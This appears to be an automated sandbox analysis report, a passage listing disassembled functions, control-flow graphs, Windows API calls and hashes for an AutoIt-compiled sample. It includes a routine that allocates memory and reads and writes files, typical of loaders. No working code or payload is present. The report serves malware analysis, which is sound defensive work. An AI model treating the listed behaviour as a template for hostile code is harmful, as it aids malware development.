                                                                                                                        • Instruction Fuzzy Hash: F021E3B5901258AFDB00DFA4E889BDDBFB4FB19700F00811AF551EA2A0D7B50548EFA4
                                                                                                                        Function 00548D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 302 548d45-548d55 303 548d57-548d6a call 53f2c6 call 53f2d9 302->303 304 548d6f-548d71 302->304 320 5490f1 303->320 306 548d77-548d7d 304->306 307 5490d9-5490e6 call 53f2c6 call 53f2d9 304->307 306->307 310 548d83-548dae 306->310 325 5490ec call 5427ec 307->325 310->307 313 548db4-548dbd 310->313 316 548dd7-548dd9 313->316 317 548dbf-548dd2 call 53f2c6 call 53f2d9 313->317 318 5490d5-5490d7 316->318 319 548ddf-548de3 316->319 317->325 324 5490f4-5490f9 318->324 319->318 323 548de9-548ded 319->323 320->324 323->317 327 548def-548e06 323->327 325->320 330 548e23-548e2c 327->330 331 548e08-548e0b 327->331 335 548e2e-548e45 call 53f2c6 call 53f2d9 call 5427ec 330->335 336 548e4a-548e54 330->336 333 548e15-548e1e 331->333 334 548e0d-548e13 331->334 337 548ebf-548ed9 333->337 334->333 334->335 368 54900c 335->368 339 548e56-548e58 336->339 340 548e5b-548e79 call 543820 call 5429c8 * 2 336->340 341 548fad-548fb6 call 54f89b 337->341 342 548edf-548eef 337->342 339->340 371 548e96-548ebc call 549424 340->371 372 548e7b-548e91 call 53f2d9 call 53f2c6 340->372 355 548fb8-548fca 341->355 356 549029 341->356 342->341 345 548ef5-548ef7 342->345 345->341 349 548efd-548f23 345->349 349->341 353 548f29-548f3c 349->353 353->341 358 548f3e-548f40 353->358 355->356 361 548fcc-548fdb GetConsoleMode 355->361 360 54902d-549045 ReadFile 356->360 358->341 363 548f42-548f6d 358->363 365 549047-54904d 360->365 366 5490a1-5490ac GetLastError 360->366 361->356 367 548fdd-548fe1 361->367 363->341 370 548f6f-548f82 363->370 365->366 375 54904f 365->375 373 5490c5-5490c8 366->373 374 5490ae-5490c0 call 53f2d9 call 53f2c6 366->374 367->360 376 548fe3-548ffd ReadConsoleW 367->376 369 54900f-549019 call 5429c8 368->369 369->324 370->341 382 548f84-548f86 370->382 371->337 372->368 379 549005-54900b call 53f2a3 373->379 380 5490ce-5490d0 373->380 374->368 386 549052-549064 375->386 377 54901e-549027 376->377 378 548fff GetLastError 376->378 377->386 378->379 379->368 380->369 382->341 389 548f88-548fa8 382->389 386->369 393 549066-54906a 386->393 389->341 397 549083-54908e 393->397 398 54906c-54907c call 548a61 393->398 400 549090 call 548bb1 397->400 401 54909a-54909f call 5488a1 397->401 407 54907f-549081 398->407 408 549095-549098 400->408 401->408 407->369 408->407
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .S
                                                                                                                        • API String ID: 0-1539595904
                                                                                                                        • Opcode ID: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
                                                                                                                        • Instruction ID: 4df9f2ad0d55cb23b9e7b728096982678500be7613d02536fa81326fd622d9b8
                                                                                                                        • Opcode Fuzzy Hash: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
                                                                                                                        • Instruction Fuzzy Hash: ABC1E174D04249AFDB15DFA8D84ABEEBFB0BF59318F044099F418AB392C7709941CB61
                                                                                                                        Function 0055065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 410 55065b-55068b call 55042f 413 5506a6-5506b2 call 545221 410->413 414 55068d-550698 call 53f2c6 410->414 419 5506b4-5506c9 call 53f2c6 call 53f2d9 413->419 420 5506cb-550714 call 55039a 413->420 421 55069a-5506a1 call 53f2d9 414->421 419->421 430 550716-55071f 420->430 431 550781-55078a GetFileType 420->431 428 55097d-550983 421->428 435 550756-55077c GetLastError call 53f2a3 430->435 436 550721-550725 430->436 432 5507d3-5507d6 431->432 433 55078c-5507bd GetLastError call 53f2a3 CloseHandle 431->433 439 5507df-5507e5 432->439 440 5507d8-5507dd 432->440 433->421 447 5507c3-5507ce call 53f2d9 433->447 435->421 436->435 441 550727-550754 call 55039a 436->441 444 5507e9-550837 call 54516a 439->444 445 5507e7 439->445 440->444 441->431 441->435 452 550847-55086b call 55014d 444->452 453 550839-550845 call 5505ab 444->453 445->444 447->421 460 55086d 452->460 461 55087e-5508c1 452->461 453->452 459 55086f-550879 call 5486ae 453->459 459->428 460->459 463 5508c3-5508c7 461->463 464 5508e2-5508f0 461->464 463->464 466 5508c9-5508dd 463->466 467 5508f6-5508fa 464->467 468 55097b 464->468 466->464 467->468 469 5508fc-55092f CloseHandle call 55039a 467->469 468->428 472 550931-55095d GetLastError call 53f2a3 call 545333 469->472 473 550963-550977 469->473 472->473 473->468
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0055039A: CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7
                                                                                                                        • GetLastError.KERNEL32 ref: 0055076F
                                                                                                                        • __dosmaperr.LIBCMT ref: 00550776
                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00550782
                                                                                                                        • GetLastError.KERNEL32 ref: 0055078C
                                                                                                                        • __dosmaperr.LIBCMT ref: 00550795
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005507B5
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 005508FF
                                                                                                                        • GetLastError.KERNEL32 ref: 00550931
                                                                                                                        • __dosmaperr.LIBCMT ref: 00550938
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
                                                                                                                        • Instruction ID: 86c9dab704b1307408f9815d7b70e31a8ce6c6967f8c5cd898817c4fe478aa28
                                                                                                                        • Opcode Fuzzy Hash: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
                                                                                                                        • Instruction Fuzzy Hash: 7DA14636A101058FDF19AF68DCA5BAE3FA0FB46321F14115AFC119F2D1DB31981ADB91
                                                                                                                        Function 0051344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78
                                                                                                                          • Part of subcall function 00513357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00513379
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0051356A
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0055318D
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005531CE
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00553210
                                                                                                                        • _wcslen.LIBCMT ref: 00553277
                                                                                                                        • _wcslen.LIBCMT ref: 00553286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                        • API String ID: 98802146-2727554177
                                                                                                                        • Opcode ID: 19c20529af85712a5106b2773150d1dd345b416f55fa79ddc1a492eeb5fed24d
                                                                                                                        • Instruction ID: 92f4a2eb1b32ecace75e30f4bbb629a098089ed271d80905e5beff44e7be68d5
                                                                                                                        • Opcode Fuzzy Hash: 19c20529af85712a5106b2773150d1dd345b416f55fa79ddc1a492eeb5fed24d
                                                                                                                        • Instruction Fuzzy Hash: 23716D714043419ED318DF65DC969ABBFE8BF99740F40082EF585871A4EB709A88DF61
                                                                                                                        Function 00512B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00512B8E
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00512B9D
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00512BB3
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00512BC5
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00512BD7
                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00512BEF
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00512C40
                                                                                                                          • Part of subcall function 00512CD4: GetSysColorBrush.USER32(0000000F), ref: 00512D07
                                                                                                                          • Part of subcall function 00512CD4: RegisterClassExW.USER32(00000030), ref: 00512D31
                                                                                                                          • Part of subcall function 00512CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
                                                                                                                          • Part of subcall function 00512CD4: InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
                                                                                                                          • Part of subcall function 00512CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
                                                                                                                          • Part of subcall function 00512CD4: LoadIconW.USER32(000000A9), ref: 00512D85
                                                                                                                          • Part of subcall function 00512CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                        • Opcode ID: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
                                                                                                                        • Instruction ID: ab420cb404ae0d20ee839d5fdab40278d11b92ac88542dcbe3edf1425b223d21
                                                                                                                        • Opcode Fuzzy Hash: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
                                                                                                                        • Instruction Fuzzy Hash: 90216A70E00358AFDB149FA5EC89AAD7FF4FB1CB50F00041AE580AA7A0D3B10548EF88
                                                                                                                        Function 00513170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 551 513170-513185 552 5131e5-5131e7 551->552 553 513187-51318a 551->553 552->553 554 5131e9 552->554 555 5131eb 553->555 556 51318c-513193 553->556 557 5131d0-5131d8 DefWindowProcW 554->557 558 5131f1-5131f6 555->558 559 552dfb-552e23 call 5118e2 call 52e499 555->559 560 513265-51326d PostQuitMessage 556->560 561 513199-51319e 556->561 562 5131de-5131e4 557->562 564 5131f8-5131fb 558->564 565 51321d-513244 SetTimer RegisterWindowMessageW 558->565 594 552e28-552e2f 559->594 563 513219-51321b 560->563 567 5131a4-5131a8 561->567 568 552e7c-552e90 call 57bf30 561->568 563->562 573 513201-513214 KillTimer call 5130f2 call 513c50 564->573 574 552d9c-552d9f 564->574 565->563 569 513246-513251 CreatePopupMenu 565->569 570 552e68-552e72 call 57c161 567->570 571 5131ae-5131b3 567->571 568->563 587 552e96 568->587 569->563 592 552e77 570->592 577 552e4d-552e54 571->577 578 5131b9-5131be 571->578 573->563 580 552dd7-552df6 MoveWindow 574->580 581 552da1-552da5 574->581 577->557 590 552e5a-552e63 call 570ad7 577->590 585 513253-513263 call 51326f 578->585 586 5131c4-5131ca 578->586 580->563 588 552da7-552daa 581->588 589 552dc6-552dd2 SetFocus 581->589 585->563 586->557 586->594 587->557 588->586 595 552db0-552dc1 call 5118e2 588->595 589->563 590->557 592->563 594->557 599 552e35-552e48 call 5130f2 call 513837 594->599 595->563 599->557
                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0051316A,?,?), ref: 005131D8
                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0051316A,?,?), ref: 00513204
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00513227
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0051316A,?,?), ref: 00513232
                                                                                                                        • CreatePopupMenu.USER32 ref: 00513246
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00513267
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                        • String ID: TaskbarCreated
                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                        • Opcode ID: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
                                                                                                                        • Instruction ID: 2ab847bb1c256f8f2e4315ca530101497210aa3205ea15995f18b23dfea5c71b
                                                                                                                        • Opcode Fuzzy Hash: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
                                                                                                                        • Instruction Fuzzy Hash: E7414939240644B7FB186B78DC7DBFD3E59F756340F04052AF9528A1A1CB708AC8E7A5
                                                                                                                        Function 0051DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D%^$D%^$D%^$D%^$D%^D%^$Variable must be of type 'Object'.
                                                                                                                        • API String ID: 0-438337734
                                                                                                                        • Opcode ID: 4f7957ec933fa1cf6e29f172ad39602dfdd6db90997e4359271aa4fe9991a0ae
                                                                                                                        • Instruction ID: 323d3e8f8dbce0a03a566d9cec9c41876ebecf7366e5eac5a79410ab5342d786
                                                                                                                        • Opcode Fuzzy Hash: 4f7957ec933fa1cf6e29f172ad39602dfdd6db90997e4359271aa4fe9991a0ae
                                                                                                                        • Instruction Fuzzy Hash: B4C2BF71A00215CFEB24CF58D886AADBBB1FF59310F248969ED56AB391D370ED81CB50
                                                                                                                        Function 0171F100 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1117 171f100-171f152 call 171f000 CreateFileW 1120 171f154-171f156 1117->1120 1121 171f15b-171f168 1117->1121 1122 171f2b4-171f2b8 1120->1122 1124 171f17b-171f192 VirtualAlloc 1121->1124 1125 171f16a-171f176 1121->1125 1126 171f194-171f196 1124->1126 1127 171f19b-171f1c1 CreateFileW 1124->1127 1125->1122 1126->1122 1129 171f1c3-171f1e0 1127->1129 1130 171f1e5-171f1ff ReadFile 1127->1130 1129->1122 1131 171f201-171f21e 1130->1131 1132 171f223-171f227 1130->1132 1131->1122 1133 171f229-171f246 1132->1133 1134 171f248-171f25f WriteFile 1132->1134 1133->1122 1136 171f261-171f288 1134->1136 1137 171f28a-171f2af CloseHandle VirtualFree 1134->1137 1136->1122 1137->1122
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0171F145
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                        • Instruction ID: 2433d424e3b5dd7d770bbc2457236b6976424147a3d950de638d8c353a1272dd
                                                                                                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                        • Instruction Fuzzy Hash: 3A51EA75A50208FBEF20DFA8CC89FDEB778AF4C701F108554FA0AEA184DA749645DB60
                                                                                                                        Function 00512C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1157 512c63-512cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00512C91
                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00512CB2
                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CC6
                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CCF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CreateShow
                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                        • Opcode ID: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
                                                                                                                        • Instruction ID: b78191da6a19a4070b5bd1660b6506e9f4f27e897899a2873503c4c8845f81f5
                                                                                                                        • Opcode Fuzzy Hash: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
                                                                                                                        • Instruction Fuzzy Hash: 1FF03A755402D07EEB300713AC88E773EBDE7EBF50B00045EF940AA5A0C6711848EAB8
                                                                                                                        Function 00582947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1272 582947-5829b9 call 551f50 call 5825d6 call 52fe0b call 515722 call 58274e call 51511f call 535232 1287 582a6c-582a73 call 582e66 1272->1287 1288 5829bf-5829c6 call 582e66 1272->1288 1293 582a7c 1287->1293 1294 582a75-582a77 1287->1294 1288->1294 1295 5829cc-582a6a call 53d583 call 534983 call 539038 call 53d583 call 539038 * 2 1288->1295 1298 582a7f-582b3a call 5150f5 * 8 call 583017 call 53e5eb 1293->1298 1296 582cb6-582cb7 1294->1296 1295->1298 1300 582cd5-582cdb 1296->1300 1337 582b3c-582b3e 1298->1337 1338 582b43-582b5e call 582792 1298->1338 1304 582cdd-582ced call 52fdcd call 52fe14 1300->1304 1305 582cf0-582cf6 1300->1305 1304->1305 1337->1296 1341 582bf0-582bfc call 53e678 1338->1341 1342 582b64-582b6c 1338->1342 1349 582bfe-582c0d DeleteFileW 1341->1349 1350 582c12-582c16 1341->1350 1343 582b6e-582b72 1342->1343 1344 582b74 1342->1344 1346 582b79-582b97 call 5150f5 1343->1346 1344->1346 1356 582b99-582b9e 1346->1356 1357 582bc1-582bd7 call 58211d call 53dbb3 1346->1357 1349->1296 1352 582c18-582c7e call 5825d6 call 53d2eb * 2 call 5822ce 1350->1352 1353 582c91-582ca5 CopyFileW 1350->1353 1354 582cb9-582ccf DeleteFileW call 582fd8 1352->1354 1377 582c80-582c8f DeleteFileW 1352->1377 1353->1354 1355 582ca7-582cb4 DeleteFileW 1353->1355 1366 582cd4 1354->1366 1355->1296 1362 582ba1-582bb4 call 5828d2 1356->1362 1372 582bdc-582be7 1357->1372 1370 582bb6-582bbf 1362->1370 1366->1300 1370->1357 1372->1342 1374 582bed 1372->1374 1374->1341 1377->1296
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582C05
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00582C87
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00582C9D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CAE
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3226157194-0
                                                                                                                        • Opcode ID: c077e8587aab84dc25c6d4aade040a46dbf7704a9f101c54c76f81e2667bb1c5
                                                                                                                        • Instruction ID: d8a466fde6715d192c1b25391eab9c62b1a2b36353e92d2b34031b6139532f0e
                                                                                                                        • Opcode Fuzzy Hash: c077e8587aab84dc25c6d4aade040a46dbf7704a9f101c54c76f81e2667bb1c5
                                                                                                                        • Instruction Fuzzy Hash: 99B1417190111AABDF15EBA4CC89EEE7FBDFF89350F1040A6F909F6141EA319A448F61
                                                                                                                        Function 00545AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
